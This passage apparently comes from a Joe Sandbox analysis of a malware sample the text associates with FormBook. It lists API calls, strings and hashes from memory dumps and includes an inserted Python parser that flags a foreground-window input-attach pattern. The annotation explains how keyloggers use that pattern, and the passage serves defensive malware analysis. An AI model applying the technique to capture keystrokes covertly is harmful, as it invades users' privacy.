                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                        • String ID:
                                                                                                        • API String ID: 3771399671-0
                                                                                                        • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                        • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                        • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                        • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                        • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                        • String ID:
                                                                                                        • API String ID: 2156557900-0
                                                                                                        • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                        • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                        • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                        • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
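Two records above deserve a closer look. In the SendMessageW pair, the message values 0x1001 and 0x1026 are LVM_SETBKCOLOR and LVM_SETTEXTBKCOLOR (LVM_FIRST is 0x1000), so that function only colours a list-view control. The GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput sequence with fAttach=1, by contrast, joins the caller's input queue to whichever window currently has focus, which is how window-automation runtimes drive other applications and how keyloggers read another thread's keyboard state; the trailing AttachThreadInput calls with fAttach=0 detach again. The Python below is an added example and not part of the Joe Sandbox report or of the sample: it parses records laid out as in this listing into structured calls, strips the "Download File" link labels that the page export fused onto the memory-dump names, names the two list-view messages, and flags the attach-to-foreground pattern. The layout rules are inferred from this page (an assumption, not a documented Joe Sandbox schema), and the sample input is abridged from the two records above.

```python
# Added example, not part of the Joe Sandbox report; the record layout is inferred from this page.
import re
from dataclasses import dataclass, field

# Constructed sample: two records abridged from this listing. The "Associated" line keeps
# the "Download File" link label that the page export fused onto the dump name.
SAMPLE = """\
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(760923D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(760923D0,00001026,00000000,?), ref: 00448E25
Memory Dump Source
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
"""

_SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"  # optional nesting prefix
    r"(\w+)\.(\w+)"                                               # Api.MODULE
    r"(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")            # (args), ref: call site
_FIELD_RE = re.compile(r"^\s*•\s*([^:]+?):\s*(.*)$")              # "• Key: value"

@dataclass
class Call:
    name: str                 # API name, e.g. AttachThreadInput
    module: str               # e.g. USER32
    args: list                # int for a hex literal, None for '?', str for text
    ref: int                  # call-site address
    subcall_of: "int | None"  # callee address when nested under "Part of subcall function"

@dataclass
class Record:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

def _arg(tok):
    tok = tok.strip()
    try:
        return None if tok in ("", "?") else int(tok, 16)
    except ValueError:
        return tok  # a string literal such as "close all" is kept as text

def parse_records(text):
    """Split the listing into Records; each record ends at its Instruction Fuzzy Hash line."""
    records, cur, section = [], Record(), None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in _SECTIONS:
            section = stripped
            continue
        m = _CALL_RE.match(line) if section == "APIs" else None
        if m:
            sub, name, module, argstr, ref = m.groups()
            args = [] if argstr is None else [_arg(t) for t in argstr.split(",")]
            cur.calls.append(Call(name, module, args, int(ref, 16), int(sub, 16) if sub else None))
            continue
        m = _FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip().removesuffix("Download File")
        if key == "Associated":              # several per record
            cur.fields.setdefault(key, []).append(value)
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":  # always the last line of a record
            records.append(cur)
            cur = Record()
    return records

# LVM_FIRST is 0x1000 (commctrl.h); these are the two list-view messages in the record above.
LISTVIEW_MSGS = {0x1001: "LVM_SETBKCOLOR", 0x1026: "LVM_SETTEXTBKCOLOR"}

def describe_message(call):
    """Name the window message of a SendMessageW call, or None if it is not one listed here."""
    if call.name != "SendMessageW" or len(call.args) < 2:
        return None
    return LISTVIEW_MSGS.get(call.args[1])

def attaches_to_foreground_input(rec):
    """True when the function resolves the foreground window's thread and then calls
    AttachThreadInput(..., fAttach=1), joining the caller's input queue to that thread."""
    names = {c.name for c in rec.calls}
    if not {"GetForegroundWindow", "GetWindowThreadProcessId"} <= names:
        return False
    return any(c.name == "AttachThreadInput" and len(c.args) == 3 and c.args[2] == 1
               for c in rec.calls)

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API ID"), [c.name for c in rec.calls], attaches_to_foreground_input(rec))
```

Run it directly to print one line per record. The attach check requires a literal fAttach of 1, so a function that only detaches (the last three calls of the record above) is not flagged on its own. The bare "Strings" headings in this listing carry no data; the string values live in the Similarity section's String ID field, which the parser keeps as an ordinary field. The CLASS, CLASSNN, INSTANCE, NAME, REGEXPCLASS and TEXT keywords in the next record's String ID are the window and control descriptor properties of the AutoIt runtime; the report does not say so, but it is a strong hint that much of this listing is interpreter code wrapped around the FormBook payload rather than the payload itself.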
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                        • API String ID: 0-1603158881
                                                                                                        • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                        • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                        • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                        • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                        APIs
                                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                        • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                        • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                        • String ID: close all$ou
                                                                                                        • API String ID: 4174999648-2099725088
                                                                                                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                        APIs
                                                                                                        • CreateMenu.USER32 ref: 00448603
                                                                                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                        • IsMenu.USER32(?), ref: 004486AB
                                                                                                        • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                        • DrawMenuBar.USER32 ref: 004486F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 161812096-4108050209
                                                                                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                        • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                         • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                         • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 978794511-0
                                                                                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClearVariant
                                                                                                        • String ID:
                                                                                                        • API String ID: 1473721057-0
                                                                                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove$_memcmp
                                                                                                        • String ID: '$\$h
                                                                                                        • API String ID: 2205784470-1303700344
                                                                                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                        APIs
                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                        • __swprintf.LIBCMT ref: 0045EC33
                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                        Strings
                                                                                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                        • API String ID: 2441338619-1568723262
                                                                                                        • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                        • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                        APIs
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
